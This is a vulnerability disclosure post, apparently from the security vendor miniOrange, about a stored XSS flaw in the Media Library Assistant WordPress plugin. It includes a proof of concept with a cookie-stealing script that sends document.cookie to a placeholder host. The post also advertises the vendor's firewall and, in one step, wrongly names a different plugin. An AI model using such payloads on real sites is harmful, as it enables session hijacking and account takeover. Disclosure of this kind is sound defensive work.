Cross-site scripting flaw in WordPress plugin Media library Assistant

             Internet traffic is on the rise rapidly. Users like things that require less effort, and with quality work, WordPress is part of this.WordPress introduced in 2003, and there are millions of Wordpress websites hosted until now. Since we know that WordPress is a fixed website building block, each site has its purpose, and we are always trying to make it distinct from other websites not just by content but by structure. We've tried a lot of themes or plugins to attach additional functionality to WordPress-based sites, but are you sure the plugin is secure for your website or not vulnerable? Security is a vital part of website development, whether in terms of content, ads and even up to user requirements or SEO, you can make your website the best. miniOrange investigates the behavior of requests and blocks the harmful IP before it reaches your site.


The Cross-site scripting(XSS) vulnerability in the Media library Assistant (version 2.8):


Media is a tab in your WordPress administrator sidebar which is utilized to oversee client transfers (pictures, sound, video, and different documents). Under the Media menu, there are two screens. The primary screen Library records all the documents in the media library. These documents can be altered and erased from the library. The subsequent screen is Add New, which permits clients to transfer records. Recall clients can likewise transfer media (pictures, recordings, and so forth) while composing a post or page. Nonetheless, the Add New connection under permits clients to transfer documents without joining them to a particular post or page.

The Media Library Assistant provides several enhancements for managing the Media Library, including several shortcodes that can be used in the post, page, or custom post type to add a gallery of images and/or other Media Library items (such as PDF documents).



miniOrange found an Authenticated Stored XSS flaw in Media Library Assistant Plugin. The XSS is all about injecting malicious code, and in this case, it is injected through an Input field. The attacker enters a malicious script to steal all user information from a low privilege account by inserting a Script in the title of the image.



Proof of Concept:


  1. Local instance of Site with the Envira photo Gallery Plugin installed:-




  2. We now enter the settings tab and find the Media/Assistant Screen Options.
    Here you will find the Menu title: This is an XSS injectable object. You can inject malicious code and this will affect the entire user dashboard across the user platform.



  3. Now enter malicious code in the Menu title and save the changes.




    Save the changes you have made and the injection is now in effect.




    Code used in the Menu Title to attack the users with this plugin installed on the same instance



    <script type="text/javascript"> window.onload = function(){ window.open("https://www.google.com", "_blank"); alert(document.cookie) } </script>

    <script type="text/javascript"> document.location= "http://evil_site/dashboard/de/cookiegraber.php?c=" + document.cookie; </script>

    After the Script is injected in the title and updated the attacker has successfully stored XSS on the site and all the users when visiting any part of the site will be affected. This is highly dangerous because the victim does not even have to go to the plugin dashboard. The code will be executed even if the user logins in the instance.

  4. Effects of the injection on the site :


    Let’s say a different user logs into the instance remotely he will be affected by the stored XSS right after login in.



    The Cross-site scripting(XSS) attack on WordPress site:


    The vulnerabilities in WordPress site enables attackers to inject malicious scripts under the impression of a trustworthy individual and force the user to perform malicious activities. There is no way to verify that the script is coming from a trusted source or not. In WordPress, we may attach additional functionality to WordPress sites through plugins, but often excellent services do have some drawbacks. After plugin activation, not only does the plugin grab the website parameters, but it also adds its input fields in it, and the chances of vulnerability in these input fields are often possible. That list of input fields contains site search, comment form, contact form, login pages, etc. The real security measure is based on these input fields because hackers exploit vulnerabilities in input fields and add malicious code to the site.



    Check out miniOrange WP Security Pro:   WP Security Pro



    How an Cross-site scripting(XSS) attack impacts a WordPress site?


    The attacker injects malicious script, which mainly contains malicious links or some malicious programs that silently get installed into the system without user interaction. Sometimes it forces the user to provide additional information. As we know, we don’t need to log in again, and again, once we login to web application, it generates a cookie session, and we can able to access web application until the session gets expired. After the cookies get stolen, the intruder will able to reach the user account without a username & password and able to view all the applications that opened in the same browser.

    There are three types of Cross-site Scripting(XSS):

    • The Reflective cross-site scripting attack is where the malicious script is injected from the client-side.

    • The persistent cross-site scripting attack is where the malicious script that is inserted by an attacker gets stored in the database, allowing the attacker to possibly retrieve information stored within the database.

    • The Dom cross-site scripting is a client-side attack. The malicious script directly executed after the execution of a legal server script.

    How to protect your WordPress site from Attackers?


    miniOrange provides a security package for your WordPress site. In it, you can get a Web application firewall to get rid of malicious activities.


    The miniOrange provides firewall based on two levels:

    • Website firewall based on plugin level:

      This will activate WAF after the WordPress load. This will block illegitimate requests after making a connection to WordPress. This will check Every Request in the plugin itself.



    • Website firewall on .htaccess level:

      At this level, WAF gets activated before the WordPress load. This level block illegitimate requests before any connection to WordPress. The illegal requests are gets blocked before any page gets loaded at this level.



    The firewall service gets enabled on plugin activation. In the free version of WP Security Pro, you get some signatures to prevent your WordPress site from cross-site scripting(XSS).



    WAF filters and blocks unauthorized requests which are coming from a web application and do not allow abuse of it.

    Further Details:

    https://security.miniorange.com/web-application-firewall-waf/
    https://wordpress.org/plugins/wp-security-pro/
    https://www.miniorange.com/